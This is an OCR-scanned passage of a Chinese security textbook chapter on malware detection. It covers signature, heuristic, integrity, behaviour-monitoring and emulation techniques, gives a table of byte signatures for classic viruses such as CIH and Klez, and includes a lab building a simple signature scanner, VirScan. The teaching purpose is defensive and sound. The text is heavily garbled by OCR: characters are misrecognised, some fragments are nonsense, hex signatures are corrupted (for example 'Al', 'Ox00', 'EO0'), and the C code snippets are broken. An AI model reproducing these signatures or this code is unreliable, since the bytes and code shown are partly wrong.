中 ,不 能 仅仅 依靠 技术 或 管理 的 任何 一 方 。“ 三 分 技术 ,七 分 管理 ”已 经 成 为 信息 安全 领域 的 
共识 。 在 恶意 代码 防范 领域 ,防范 策略 同样 重要 。 一 套 好 的 管理 制度 和 策略 应 该 以 单位 实 
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味 情况 为 主要 依据 ,能 及 时 反映 单位 实际 情况 变化 ,具有 良好 的 可 操作 性 ,由 科学 的 管理 条 


10.4 恶意 代码 的 检测 


恶意 代码 检测 的 重要 性 就 如 同 医 生 对 病人 所 患 疾病 的 诊断 。 对 于 病人 ,只 有 确诊 以 后 ， 
医生 才能 对 症 下 药 。 对 于 恶意 代码 ,同样 也 必须 先 确 定 有 恶意 代码 的 种 类 症状 ,才能 准确 地 
清除 它 。 如 果 盲 目地 乱 清除 ,可 能 会 破坏 本 来 就 正常 的 应 用 程序 。 


10.4.1 恶意 代码 的 检测 技术 


恶意 代码 的 检测 技术 按 是 否 执行 代码 可 分 为 静态 检测 和 动态 检测 两 种 。 

静态 检测 是 指 在 不 实际 运行 目标 程序 的 情况 下 进行 检测 。 一 般 通 过 二 进 制 统计 分 析 、 
反 汇 编 ` 反 编译 等 技术 来 查看 和 分 析 代 码 的 结构 ,流程 及 内 容 , 从 而 推导 出 其 执行 的 特性 , 因 
此 检测 方法 是 完全 的 。 篆 用 的 静态 检测 技术 包括 特征 码 扫 描 技 术 、 司 发 式 扫 摘 技术 .完整 性 
分 析 技 术 、 基 于 语义 的 检测 技术 等 。 

动态 检测 是 指 在 运行 目标 程序 时 ,通过 监测 程序 的 行为 、 比 较 运 行 环境 的 变化 来 确定 目 
标 程 序 是 否 包含 恶意 行为 。 动 态 检测 是 根据 目标 程序 一 次 或 多 次 执行 的 特性 ,判断 是 否 存 
在 恶意 行为 ,可 以 准确 地 检测 出 异常 属性 ,但 无 法 判定 某 特定 属性 是 否 一 定 存在 ,因此 是 不 
完全 检测 。 篆 用 的 动态 检测 技术 包括 行为 监控 分 析 技 术 、 代 码 仿 真 分 析 技 术 等 。 

1. 特征 码 扫 描 技 术 

特征 码 扫描 技 术 是 使 用 最 为 广泛 的 恶意 代码 检测 方法 之 一 。 特 征 码 (CSignature) 一般 
是 指 某 个 或 某 类 恶意 代码 所 具有 的 特征 指令 序列 ,可 以 用 来 区 别 于 正常 代码 或 其 他 恶意 代 
码 。 其 检测 过 程 是 : 通过 分 析 恶 意 代码 样本 ,从 样本 的 代码 中 提取 特征 码 存 人 特征 库 中 ; 
当 扫 描 目 标 程序 时 ,将 当前 程序 的 特征 码 与 特征 库 中 的 恶意 代码 特征 进行 对 比 ,判断 是 否 含 
有 特征 数据 ,有 则 认为 是 恶意 代码 。 应 用 该 技术 时 ,需要 不 断 地 对 特征 码 库 进行 扩充 ,一 旦 
捕捉 到 新 的 恶意 代码 ,就 要 提取 相应 特征 码 并 加 入 到 库 中 ,从 而 可 以 发 现 并 查 杀 该 恶意 
代码 。 

特征 码 的 提取 需要 用 到 分 析 恶 意 代码 的 专业 技术 ,如 噪声 引导 、 目 动产 生 分 发 等 ,一 般 
采用 手动 和 自动 方法 来 实现 。 手 动 方 法 利用 人 工 方 式 对 二 进 制 代码 进行 反 汇 编 ,分 析 反 汇 
编 的 代码 ,发 现 非 常规 (正常 程序 中 很 少 使 用 的 ) 的 代码 片段 ,标示 相应 机 器 码 作为 特征 值 ; 
日 动 方法 通过 构造 可 被 感染 的 程序 ,触发 恶意 代码 进行 感染 ,然后 分 析 被 感染 的 程序 ,发 现 
感染 区 域 中 的 相同 部 分 作为 候选 ,然后 在 正常 程序 中 进行 检查 ,选择 误 殴 率 最 低 的 一 个 或 几 
个 作为 特征 码 。 特 征 码 的 比 对 一 般 采 用 多 模式 匹配 算法 ,如 Aho-Corasick 目 动 机 匹配 算法 
(简称 AC 算法 )、Veldman 算法 .Wu-Manber 算法 等 。 

特征 码 扫 摘 技 术 的 检测 精度 高 ,可 识别 恶意 代码 的 名 称 、. 误 警 率 低 ,是 各 种 杀毒 软件 、 防 
护 系统 的 首选 。 由 于 早期 恶意 代码 种 类 少 ,形态 单一 ,这 种 检测 方法 取得 了 较 好 的 效果 ,只 
要 特征 库 中 存在 该 恶意 代码 的 特征 码 , 就 能 检测 出 来 。 随 着 恶意 代码 种 类 和 数量 的 不 断 增 
加 ,针对 不 同 种 类 和 方式 的 恶意 行为 ,特征 码 扫 描 技 术 要 求 有 针对 性 地 搜集 和 整理 不 同 版 本 
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的 特征 库 ,并 定期 进行 更 新 和 维护 。 特 征 库 的 不 断 扩 大 不 仅 提高 了 维护 成 本 ,也 降低 了 检测 
效率 。 同 时 ,特征 码 扫 描 技术 还 存在 不 能 检查 未 知 和 多 态 性 的 恶意 代码 ,无 法 对 付 隐蔽 性 
(如 自修 改 代 码 .和 目 产 生 代 码 ) 恶 意 代 码 等 缺点 。 由 于 恶意 代码 采用 了 代码 变形 .代码 混 消 、 
代码 加 密 、 加 壳 技 术 等 的 自我 保护 技术 ,甚至 导致 很 多 已 知 的 恶意 代码 也 无 法 通过 特征 码 扫 
描 技术 检测 出 来 。 

启发 式 扫 描 技术 

启发 式 扫描 技术 是 对 特征 码 扫描 技术 的 一 种 改进 。 其 思路 是 : 当 提 取出 目标 程序 的 特 
征 后 与 特征 库 中 已 知 恶意 代码 的 特征 做 比较 ,只 要 匹配 程度 达到 给 定 的 国 值 ,就 认定 该 程序 
包含 恶意 代码 。 这 里 的 特征 包括 已 知 的 植 入 隐藏. 修改 注册 表 , 操 纵 中 断 向 量 ,使 用 非常 规 
指令 或 特殊 字符 等 行为 特征 。 例如 一 般 恶 意 代码 执行 时 都 会 调用 一 些 内 核 函数 ,而 这 类 调 
用 与 正常 代码 具有 很 大 的 区 别 。 利用 这 一 原理 ,扫描 程序 时 可 以 提取 出 该 程序 调用 了 哪些 
内 核 函数 、 调 用 的 顺序 和 调用 次 数 等 数据 ,将 其 与 代码 库 中 已 知 的 恶意 代码 对 内 核 函数 的 调 
用 情况 进行 比较 。 

启发 式 扫 描 技术 基于 预定 义 的 扫描 技术 和 判断 规则 来 进行 目标 程序 检测 ,不 仅 能 有 效 
地 检测 出 已 知 的 恶意 代码 ,还 能 识别 出 一 些 变 种 、 变 形 和 未 知 的 恶意 代码 。 启 发 式 扫描 技术 
也 存在 误 警 现象 ,有 时 会 将 一 个 正常 的 程序 识别 为 恶意 程序 ,而 且 该 方法 仍旧 基于 特征 的 提 
取 , 所 以 恶意 代码 编写 者 只 要 通过 改变 恶意 代码 的 特征 就 能 轻易 地 避 开 启发 式 扫描 技术 的 
检测 。 

3. 完整 性 分 析 技 术 

完整 性 分 析 技 术 采 取 特 征 校 验 的 方式 。 在 初始 状态 下 ,通过 特征 算法 如 MD5、SHAI1 
等 ,获得 目标 文件 的 特征 喻 希 值 ,并 将 其 保存 为 相应 的 特征 文件 。 当 每 次 使 用 文件 前 或 使 用 
过 程 中 ,定期 检查 其 特征 喻 希 值 是 否 与 原来 保存 的 特征 文件 一 致 ,从 而 发 现 文件 是 否 被 臭 
改 。 这 种 方法 既 可 发 现 已 知 恶 意 代码 ,又 可 发 现 未 知 恶 意 代码 。 

在 实际 检测 过 程 中 ,对 于 Windows 操作 系统 ,一 般 只 要 目标 对 象 具 有 合法 的 微软 数字 
签名 就 可 以 直接 略 过 ; 对 于 其 他 文件 , 则 要 进行 特征 值 对 比 。 可 见 , 完 整 性 检查 对 于 系统 文 
件 的 检验 过 程 相对 简单 便捷 ,只 需要 记录 特征 值 即 可 。 

完整 性 分 析 技 术 以 散 列 值 的 变化 作为 判断 受到 恶意 代码 影响 的 依据 ,容易 实现 ,能 发 现 
未 知 恶意 代码 ,被 查 文件 的 细微 变化 也 能 发 现 , 保 护 能 力 强 ,但 缺点 也 比较 明显 。 恶 意 代 码 
感染 并 非 文 件 内 容 改 变 的 唯一 原因 ,文件 内 容 的 改变 有 可 能 是 正常 程序 引起 的 , 某 些 正常 程 
序 的 版 本 更 新 .口令 变更 .运行 参数 修改 等 都 可 能 导致 散 列 值 的 变化 ,从 而 引发 误 判 。 其 他 
缺点 还 包括 必须 预先 记录 正常 态 的 特征 喻 希 值 \ 不 能 识别 恶意 代码 名 称 \ 程 序 执行 速度 变 慢 
等 。 完 整 性 分 析 技 术 往 往 作 为 一 种 辅助 手段 得 到 广泛 应 用 ,主要 用 于 系统 安全 扫描 。 

4. 基于 语义 的 检测 技术 

基于 语义 的 恶意 代码 检测 对 已 知 恶 意 代 码 和 目标 程序 进行 代码 分 析 , 得 到 程序 的 语 
特征 ,通过 对 已 知 恶 意 代 码 和 rap ttn ett ctr 
进行 分 析 , 找 出 两 者 间 是 否 匹 配 , 从 而 判断 目标 程序 是 否 包 含 恶意 代码 。 

主要 缺点 是 对 程序 代码 的 分 析 依 赖 于 反 汇 编 代码 的 精度 ,另外 判断 子 图 同 构 问 题 是 
NP 完全 问题 ,因此 在 匹配 算法 上 需要 进一步 处 理 。 
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5. 行为 监控 分 析 技 术 

行为 监控 分 析 技 术 是 指 利 用 系统 监控 工具 审查 目标 程序 运行 时 引发 的 系统 环境 变化 ， 
根据 其 行为 对 系统 所 产生 的 影响 来 判断 目标 程序 是 否 具 有 恶意 。 

恶意 代码 在 运行 过 程 中 通常 会 对 系统 造成 一 定 的 影响 : 有 些 恶 意 代码 为 了 保证 上 自己 的 
日 启动 功能 和 进程 隐藏 的 功能 ,通常 会 修改 系统 注册 表 和 系统 文件 ,或 者 会 修改 系统 配置 。 
有 些 恶 意 代码 为 了 进行 网 络 传播 或 把 收集 到 的 信息 传递 给 远 端 控制 者 ,会 在 本 地 开启 一 些 
网 络 端口 或 网 络 服务 等 。 行 为 监控 分 析 通 过 收集 系统 变化 来 进行 恶意 代码 分 析 , 分 析 方 法 
相对 简单 ,效果 明显 ,已 经 成 为 恶意 代码 检测 的 常用 手段 之 一 。 

行为 监控 检测 属于 异常 检测 的 范畴 ,一 般 包 含 数据 收集 、 解 释 分 析 ,行为 匹配 3 个 模块 ， 
其 核心 是 如 何 有 效 地 实现 数据 收集 。 按 照 监控 行为 类 型 ,行为 监控 分 析 技 术 可 分 为 网 络 行 
为 分 析 和 主机 行为 分 析 。 按 照 监 控 对 象 的 不 同 , 行 为 监控 分 析 技 术 又 可 分 为 文件 系统 监控 、 
进程 监控 网 络 监 控 \ 注 册 表 监控 等 。 

目前 可 用 于 行为 监控 分 析 的 工具 有 很 多 。 例 如 ,FileMon 是 一 种 常用 的 文件 监控 工具 ， 
能 记录 与 文件 相关 的 许多 操作 行为 (如 打开 、 读 写 、 删 除 和 保存 等 ); Process Explorer 是 一 
个 专业 的 进程 监控 程序 ,可 以 看 到 进程 的 优先 级 、 环 境 变 量 , 还 能 监控 进程 婆 载 过 程 和 注册 
表 键 值 的 变化 情况 ; TCPview、Nmap 和 Nessus 则 是 常用 的 网 络 监控 工具 。 

6. 代码 仿真 分 析 技 术 

代码 仿真 分 析 是 将 目标 程序 运行 在 一 个 可 控 的 模拟 环境 (如 虚拟 机 沙 盒 ) 中 ,通过 跟踪 
目标 程序 执行 过 程 使 用 的 系统 函数 .指令 特征 等 进行 恶意 代码 检测 分 析 。 在 程序 运行 时 进 
行动 态 追 踪 ,能够 高 效 地 捕捉 到 异常 行为 ,但 恶意 代码 发 作 后 ,会 对 系统 造成 一 定 的 影响 ,其 
至 可 能 引起 不 必要 的 损失 ,因此 利用 代码 仿真 分 析 技 术 , 在 模拟 环境 下 运行 目标 程序 , 既 可 
以 在 动态 环境 下 对 目标 程序 进行 有 效 跟 踊 , 也 可 以 把 可 能 造成 的 恶意 代码 影响 限制 在 模拟 
环境 内 ,是 一 个 很 好 的 选择 。 


10.4.2 恶意 代码 的 检测 方法 


学 习 了 恶意 代码 检测 原理 后 ,就 要 在 该 原理 的 指导 下 来 检测 恶意 代码 。 通 常 恶意 代码 
的 检测 方法 有 两 类 : 手工 检测 和 自动 检测 。 

1. 手工 检测 

手工 检测 是 指 通过 一 些 工具 软件 (Debug UltraEdit\EditPlus SoftICE 、TRW 、OllyDbg 
等 ) 进 行 恶 意 代 码 的 检测 。 这 种 方法 比较 复杂 ,需要 检测 者 熟悉 机 器 指令 和 操作 系统 ,因而 
不 可 能 普及 。 它 的 基本 过 程 是 利用 一 些 工 具 软 件 ,对 易 遭 受 恶 意 代 码 攻 击 和 修改 的 内 存 及 
磁盘 的 有 关 部 分 进行 检查 ,通过 和 正常 情况 下 的 状态 进行 对 比分 析 , 来 判断 是 否 被 恶意 代码 
感染 。 用 这 种 方法 检测 恶意 代码 费时 费力 ,但 可 以 剖析 新 恶意 代码 ,并 检测 一 些 自 动 检测 工 
具 不 认识 的 新 恶意 代码 。 

2. 自动 检测 

自动 检测 是 指 通 过 一 些 自动 诊断 软件 来 判断 系统 是 否 染 毒 的 方法 。 自 动 检测 方法 比较 
简单 ,一 般 用 户 都 可 以 进行 ,但 需要 较 好 的 诊断 软件 。 这 种 方法 可 方便 地 检测 大 量 的 恶意 代 
码 , 但 是 ,自动 检测 工具 只 能 识别 已 知 恶 意 人 代码, 而且 自 动 检测 工具 的 发 展 总 是 滞后 于 恶意 
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代码 的 发 展 ,所 以 日 动 检测 工具 只 能 识别 部 分 未 知 恶 意 代码 。 

从 这 两 种 方法 的 定义 我 们 可 以 看 出 它们 的 区 别 : 手工 检测 方法 操作 难度 大 并 且 技 术 复 
杂 , 它 需要 操作 人 员 具 有 一 定 的 软件 分 析 经 验 及 对 操作 系统 有 深入 的 了 解 ; 而 目 动 检测 方 
法 操作 简单 .使 用 方便 ,适合 一 般 的 计算 机 用 户 学 习 使 用 。 但 是 ,由 于 恶意 代码 的 种 类 较 多 ， 
程序 复杂 ,再 加 上 不 断 地 出 现 恶意 代码 的 变种 ,因此 目 动 检测 方法 不 可 能 检测 所 有 未 知 的 恶 
意 代 码 。 在 出 现 一 种 新 型 的 恶意 代码 时 ,如 果 现 有 的 各 种 检测 工具 无 法 检测 这 种 恶意 代码 ， 
则 只 能 用 手工 方法 进行 恶意 代码 的 检测 。 其 实 , 日 动 检 测 也 是 在 手工 检测 成 功 的 基础 上 把 
手工 检测 方法 程序 化 后 所 得 的 。 因 此 ,可 以 说 ,手工 检测 恶意 代码 是 最 基本 、 最 有 力 的 工具 。 


10.4.3 自动 检测 程序 核心 部 件 


由 于 恶意 代码 入 侵 事 件 层出不穷 ,几乎 每 一 台 计 算 机 上 都 安装 了 不 同 品牌 的 查 杀 软件 。 
一 般 用 户 会 认为 查 杀 软 件 是 非常 神秘 的 。 那 么 查 杀 软件 是 根据 什么 原理 来 工作 的 呢 ? 下 面 
主要 讨论 日 动 诊断 恶意 代码 的 最 简单 方法 一 一 特征 码 扫 描 法 。 基 于 特征 码 扫描 法 的 日 动 诊 
靳 程 友 至少 要 包括 两 部 分 : 特征 码 (Pattern/Signature) 库 和 扫描 引擎 (Scan Engine) 。 

1. 特征 码 

所 谓 特 征 码 ,其 实 可 以 说 成 恶意 代码 的 “指纹 ”, 当 安全 软件 公司 收集 到 一 个 新 的 恶意 代 
码 时 ,就 可 以 从 这 个 恶意 代码 程序 中 截取 一 小 段 独一无二 并 且 足 以 表示 这 个 恶意 代码 的 二 
进 制 代码 (Binary Code) ,作为 查 杀 程序 辨认 此 恶意 代码 的 依据 ,而 这 段 独一无二 的 二 进 制 
代码 就 是 所 谓 的 特征 码 。 二 进 制 代码 是 计算 机 的 最 基本 语言 (机 硕 码 ) ,在 计算 机 中 所 有 可 
以 执行 的 程序 (如 EXE、COM) 几 乎 都 是 由 二 进 制程 序 代码 所 组 成 的 。 对 于 宏 病 毒 来 说 , 虽 
然 它 只 是 包含 在 Word 文档 中 的 宕 ,可 是 它 的 宏 程 序 也 是 以 二 进 制 代 码 的 方式 存在 于 Word 
文档 中 的 。 特 征 码 是 如 何 产生 的 ? 其 实 特征 码 必 须 依 照 各 种 不 同 格式 的 档案 及 恶意 代码 感 
染 的 方式 来 取得 。 例 如 ,如 果 有 一 个 Windows 的 程序 被 恶意 代码 感染 ,那么 安全 软件 公司 
就 必须 先 研 究 出 Windows 文件 存储 的 格式 ,看 看 Windows 文件 是 怎么 被 操作 系统 执行 ,以 
便 找 出 Windows 程序 的 进入 点 ,因为 恶意 代码 就 是 藏身 在 这 个 地 方 来 取得 控制 权 并 进行 传 
染 及 破坏 。 知 道 恶意 代码 程序 在 一 个 Windows 文件 中 所 存在 的 位 置 之 后 ,就 可 以 从 这 个 区 
域 中 来 找 出 一 段 特殊 的 恶意 代码 特征 码 供 扫 描 引 擎 使 用 。 

在 安全 软件 公司 中 都 有 技术 人 员 专 门 在 为 各 种 不 同类 型 的 恶意 代码 提取 特征 码 ,可 是 
当 恶 意 代码 越 来 越 多 ,要 找 出 每 一 个 恶意 代码 都 独一无二 的 特征 码 可 能 就 不 太 容易 了 ,有 时 
候 甚 至 这 些 特征 码 还 会 误 判 到 一 些 不 是 恶意 代码 的 正常 文件 ,所 以 通常 安全 软件 公司 在 将 
恶意 代码 特征 码 送 给 客户 前 都 必须 先 经 过 一 番 严 格 的 测试 , 才 放 在 Internet 上 供 使 用 者 日 
由 下 载 。 

特征 码 扫 描 法 是 用 每 一 个 恶意 代码 体 含 有 的 特征 码 (Signature) 对 被 检测 的 对 象 进 行 
扫 摘 。 如 果 在 被 检测 对 象 内 部 发 现 了 某 一 个 特征 码 , 就 表明 发 现 了 该 特征 码 所 代表 的 恶意 
代码 。 国 外 将 这 种 按 搜索 法 工作 的 恶意 代码 扫描 软件 称 为 Scanner。 

恶意 代码 扫描 软件 由 两 部 分 组 成 : 一 部 分 是 恶意 代码 特征 码 库 ,含有 经 过 特别 选 定 的 
各 种 恶意 代码 的 特征 码 ; 男 一 部 分 是 利用 该 特征 码 库 进行 扫描 的 扫描 程序 。 扫 描 程 序 能 识 
别 的 恶意 代码 的 数目 完全 取决 于 特征 码 库 内 所 含 恶意 代码 的 种 类 有 和 多少。 显而易见 , 库 中 
恶意 代码 的 特征 码 种 类 越 多 ,扫描 程序 能 认 出 的 恶意 代码 就 越 多 .。 
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恶意 代码 特征 码 的 选择 是 非常 重要 的 。 短 小 的 恶意 代码 只 有 一 百 多 字 节 ,而 较 长 的 代 
码 串 有 上 百 KB 字 节 的 。 如 果 随 意 从 恶意 代码 体内 选 一 段 字 符 串 作为 其 特征 码 , 可 能 在 不 
同 的 环境 中 ,该 特征 码 并 不 真正 具有 代表 性 ,不 能 用 于 将 该 特征 码 所 对 应 的 恶意 代码 检查 出 
来 。 选 择 特 征 码 的 规则 有 以 下 几 点 。 

(1) 特征 码 不 应 含有 恶意 代码 的 数据 区 ,数据 区 是 会 经 常 变化 的 。 

(2) 特征 码 足 以 将 该 恶意 代码 区 别 于 其 他 恶意 代码 和 该 恶意 代码 的 其 他 变种 。 

(3) 在 保持 唯一 性 的 前 提 下 ,应 尽量 使 特征 码 长 度 短 些 ,以 减少 时 间 和 空间 开销 。 

(4) 特征 码 必 须 能 将 恶意 代码 与 正常 的 正常 程序 区 分 开 。 

选择 恰当 的 特征 码 是 非常 困难 的 ,这 也 是 杀毒 软件 的 精华 所 在 。 一 般 情况 下 ,特征 
码 是 由 连续 的 硅 干 个 字 节 组 成 的 串 , 但 是 有 些 扫 描 程 序 采 用 的 是 可 变 长 串 , 即 在 串 中 包 
含 通配符 字 节 。 扫 描 程 序 使 用 这 种 特征 码 时 ,需要 对 其 中 的 通配符 做 特殊 人 处理。 例如 ， 
给 定 特征 码 为 “D6 82 00 22 ? 45 AC”, 则 “D6 82 00 22 27 45 AC” 和 “D6 82 00 22 9C 45 
AC” 都 能 被 识别 出 来 。 又 如 ,给 定 特 征 码 为 “D6 82 ? [?] [?] [3] 45 CB”, 则 可 以 匹配 
“D6 82 00 45 CB”“*D6 82 00 11 45 CB” 和 “D6 82 00 11 22 45 CB”。 但 不 匹配 “D6 82 00 
11 22 33 44 45 CB”, 因 为 82 和 45 之 间 的 子 串 已 超过 4 个 字 节 。 第 见 恶意 代码 的 特征 码 
如 表 10-1 所 示 。 


表 10-1 常见 恶意 代码 的 特征 码 


恶意 代码 名 称 特 征 码 
AIDS 42 E8 EF FF 8E D8 2D CC 
Bad boy 2E FF 36 27 01 0E 1F2E FF 26 25 01 
CIH 55 8D 44 24 F8 33 DB 64 87 03 
Christmas BC CA 0A FC E8 03 00 E9 7D 05 50 51 56 BE59 00 B9 1C 09 90 D1 E9 El 
DBASE 80 FC 6C 74 EA 80 FC 58 74 E5 
Do-Nothing 72 04 50 EB 07 90 B4 4C 
EDV #3 75 1C 80 FE 01 75 17 5B 07 1F 58 83 
Friday. 432 50 CB 8C C8 8E D8 E8 06 00 E8 D9 00 E9 04 01 06 
Ghost 90 EA 59 EC 00 90 90 
Ita Vir 48 EB D8 1C D3 95 13 93 1B D3 97 
Klez Al 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 
Lisbon 8B 11 79 3D 0A 00 2E 89 
MIXI/ Icelandic 43 81 3F 45 58 75 Fl B8 00 43 
Ping Pong VB Al F5 81 A3 F5 7D 8B 36 F9 81 
Stoned/ Marijuana 00 53 51 52 06 56 57 
Taiwan 8A OE 95 00 81 El FE 00 BA 9E 
TYPOQ Boot 24 13 55 AA 
Vcomm 0A 95 4C B3 93 47 El 60 B4 
69 6C 20 36 20 73 65 74 74 65 6D 62 72 65 00 00 5C 64 6C 6C 6D 67 72 64 
Worm/ Borzella 61 74 00 47 65 73 F9 20 61 69 20 64 69 73 63 65 70 6F 6C 69 20 27 49 6E 20 


YanKee Doodle 


76 65 72 69 74 EO0 2C 20 69 6E 20 76 65 72 69 74 EO0 20 76 69 20 64 69 63 
6F 20 79 3D 


35 CD 21 8B F3 8C C7 
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2. 扫描 引擎 


扫描 引擎 可 以 说 是 查 杀 软件 中 最 为 精华 的 部 分 。 当 使 用 一 套 软 件 时 ,不 论 它 的 界面 是 
否 精美 ,操作 是 否 人 简便 ,功能 是 否 完善 ,这 些 都 不 足以 证 明 一 套 查 杀 软 件 的 好 坏 。 事 实 上 , 当 
用 户 操作 碍 杀 软 件 去 扫描 茶 一 个 磁盘 驱动 硕 或 目录 时 , 它 其 实 是 把 这 个 磁盘 驱动 硕 或 目录 
下 的 文件 一 一 送 进 扫描 引擎 来 进行 扫描 ,也 就 是 其 所 呈现 的 深 之 界面 其 实 只 是 一 个 用 户 接 
口 (User Interface, UTD ,真正 影响 扫描 速度 及 检测 准确 率 的 因素 就 是 扫描 引擎 ,扫描 引擎 是 
一 个 没有 界面 ` 没 有 包 效 的 核心 程序 , 它 被 放 在 查 杀 软件 所 安 狼 的 目录 之 下 ,就 好 像 汽 车 引 
黎平 第 是 无 法 直接 看 见 的 ,可 是 它 却 是 影响 汽车 性 能 最 主要 的 关键 。 有 了 特征 码 , 有 了 扫描 
引擎 ,再 配合 一 个 精美 的 操作 界面 ,就 成 了 市 场 上 所 看 到 的 查 杀 软件 。 

绝 大 多 数 的 人 都 以 为 安 交 了 一 和 套 查 杀 软 件 之 后 ,就 可 以 从 此 高 枕 无 忱 了 ,这 是 一 个 绝对 
错误 的 观念 ,因为 恶意 代码 的 种 类 及 形态 一 直 在 改变 ,新 恶意 代码 也 每 天 不 断 地 被 产生 ,如 
果 不 经 党 更 换 最 新 的 特征 人 码 以 及 扫描 引擎 , 青 强 大 的 查 杀 软件 也 会 有 失灵 的 一 天 。 举 个 最 
明显 的 例子 来 说 ,在 还 没有 出 现 宏 病毒 以 前 ,全 世界 没有 任何 一 家 查 杀 软 件 厂 商 文 持 宏 病毒 
扫描 能 力 ,如 果 还 在 沿用 数 年 前 的 查 杀 软 件 , 就 无 法 侦 测 到 宏 病 毒 了 ,所 以 必须 使 用 能 扫 到 
宏 病 毒 的 特征 码 及 文 持 宏 病 毒 的 扫描 引擎 。 

耕 只 单单 更 换 特征 码 或 扫描 引擎 还 是 不 够 的 ,因为 旧 的 特征 码 文 件 可 能 还 没 加 入 宏 病 
毒 的 特征 码 ,或 者 是 旧 的 扫描 引擎 根本 不 支持 对 某 种 文件 进行 查 杀 ,因此 必须 同步 更 新 特征 
码 和 扫描 引擎 才能 有 效 发 挥 效果 。 由 于 特征 码 和 扫描 引擎 是 杀毒 工作 中 相当 重要 的 一 环 ， 
目前 一 些 比较 大 的 安全 软件 厂商 部 有 将 特征 码 及 扫描 引擎 放 在 网 站 上 供 人 免费 下 载 。 


10.4.4 恶意 代码 查找 实验 


【实验 目的 】 
税 握 恶意 代码 查找 基本 原理 。 
【实验 环境 】 


(1) Windows XP 操作 系统 。 

(2) Visual Studio 6. 0 应 用 程序 。 

【实验 步骤 】 

(1) 从 下 载 文件 中 复制 实验 文件 到 实验 计算 机 上 (源码 位 置 本 书 配 套 素材 目录 
\Experiment\ Chiklez) 。 

(2) 该 目录 下 的 DontAllow 是 防 删 除 功能 的 动态 链接 库 ,事先 编 详 该 程序 。 

(3) 编译 根 目录 下 的 程序 ,生成 病毒 查找 应 用 程序 。 

(4) 运行 VirRemv. exe, 根 据 按钮 指示 操作 ,体验 病毒 查找 功能 。 

【实验 源码 】 

VirScan 是 一 个 简单 的 示例 程序 ,该 程序 演示 了 根据 病毒 特征 码 发 现 特定 病毒 CCIH 和 
Klez) 的 方法 。VirScan 是 基于 MFC 实现 的 。 

VirScan 从 程序 入 口 点 开始 查找 病毒 特征 码 , 入 口 点 是 根据 PE 文件 格式 实现 的 (如 果 
读者 忘 了 这 些 知识 ,请 翻阅 前 面 的 草 节 )。 程 序 实现 了 对 目录 的 递归 搜索 ,默认 情况 下 ,查找 
PE 类 型 文件 的 病毒 。 由 于 Klez 病毒 会 凶 载 杀毒 引擎 ,其 破坏 力 更 加 强大 。 为 了 防止 被 病 
毒 破坏 ,VirScan 用 一 个 DLL 来 保持 扫描 引擎 的 活动 状态 ,以 达到 保护 扫描 引擎 的 目的 。 
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在 程序 入 口 点 获取 了 部 分 标记 作为 病毒 特征 码 。 对 于 CIH 病毒 来 说 ,由 于 它 不 会 动态 


地 改变 程序 入 口 点 处 的 标记 ,因此 这 种 获得 病毒 特征 码 的 方法 是 没有 问题 的 。 但 是 对 于 
Klez 来 说 就 不 太 合 适 了 。Klez 病毒 会 动态 地 改变 程序 入 口 点 处 的 前 16 个 字 节 ,所 以 
VirScan 跳 过 了 前 16 个 字 节 。 


在 介绍 查 毒 程序 以 前 ,首先 构造 一 个 人 简单 的 病毒 库 virus. pattern。 为 了 方便 ,该 文件 采 


用 ASCII 码 制作 ,用 notepad. exe 打开 它 就 可 以 看 到 下 面 的 内 容 。 病 毒 库 virus. pattern 的 
结构 如 下 : 


六 进 


Klez = {Al, 00, 00, 00, 00, 50, 64, 89, 25, 00, 00, 00, 00, 83, EC, 58, 53, 56, 57, 89}; 
CIh = 155, 8D, 44, 24. EF8, 33, DB, 64, 87, 03}; 


1. 初始 化 


在 初始 化 阶段 要 完成 两 件 事情 : 站 先 ,从 病毒 库 中 读 取 各 个 病毒 的 特征 码 , 并 转换 成 十 
制 ; 其 次 ,保护 VirScan 程序 ,防止 被 病毒 删除 。 
读 取 病毒 特征 码 的 过 程 比较 简单 ,这 里 就 不 做 详细 介绍 了 。 经 过 转换 后 的 格式 如 下 : 


unsigned char KlezSignaturel[ ] = {0xA1, 0x00, Ox00, 0x00, Ox00, Ox50, 0x64, 0x89, 0x25, 0x00, 
0x00, Ox00, Ox00, 0x83, OxEC, 0x58, Ox53, 0x56, Ox57, 0x89}; 
unsigned char CihSignature[ ] = {0x55, 0x8D, 0x44, 0x24, OxF8, 0x33, OxDB, 0x64, 0x87, 0x03}; 


用 于 保护 VirScan 程序 的 过 程 如 下 。 
首先 ,编写 一 个 普通 的 DLL, 该 DLL 将 导出 一 个 名 称 为 DontAllowForDeletion 的 函 
该 图 数 的 功能 是 装载 VirScan 程序 。 其 代码 如 下 : 


BOOL WINAPI DontAllowForDeletion(LPSTR Str) 

{ 

HANDLE hrFile; 

if((hFile= CreateFile(Str, GENERIC READ, FILE SHARE READ, NULL, OPEN EXISTING, 
FILE ATTRIBUTE READONLY, NULL)) == INVALID HANDLE VALUE){ 
return FALSE; 

} 

return TRUE; 

} 


其 次 ,在 VirScan 启动 时 ,调用 DLL 的 导出 函数 ,实现 对 VirScan 程序 的 保护 。 其 实现 


代码 如 下 : 


DontAllowDeletion = (DLLFUNC * )GetProcAddress(hLib, "DontAllowForDeletion"); 
DontAllowDeletion( TmpPath) ) ; 
//TmpPath 为 VirScan 在 系统 中 的 物理 位 置 


2. 文件 查找 模块 
文件 查找 模块 的 功能 是 在 指定 的 目录 下 递归 搜索 特定 类 型 (扩展 名 ) 文 件 ,然后 再 调用 


病毒 查找 模块 来 判断 该 文件 是 否 染 毒 。 该 模块 是 病毒 查找 模块 的 上 层 调 用 模块 。 它 的 实现 
代码 参考 源码 。 
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3. 病毒 查找 模块 
病毒 查找 模块 是 扫描 引擎 的 核心 模块 。 该 模块 的 功能 是 对 某 个 输入 文件 进行 病毒 查 
找 , 查 找 的 依据 是 病毒 的 特征 码 。 该 模块 的 实现 代码 参考 源码 。 


10.5 恶意 代码 的 请 除 


在 10. 4 节 分 析 了 一 个 根据 恶意 代码 特征 码 查找 恶意 代码 的 程序 实例 ,其 原理 是 在 文件 
中 查找 恶意 代码 特征 码 并 逐一 核对 。 清 除 恶 意 代 码 比 查找 恶意 代码 在 原理 上 要 难得 多 。 如 
果 要 清除 恶意 代码 ,不 仅 需 要 知 近 恶意 代码 的 特征 码 , 还 需要 知 站 恶意 代码 的 感染 方式 ,以 
及 详细 的 感染 步骤 。 


10.5.1 恶意 代码 清除 的 原理 


ein tea nd 

过 程 称 为 恶意 代码 清除 (杀毒 )。 我 们 知道 ,并 不 是 所 有 的 染 毒 文件 都 可 以 安全 地 清除 掉 恶 

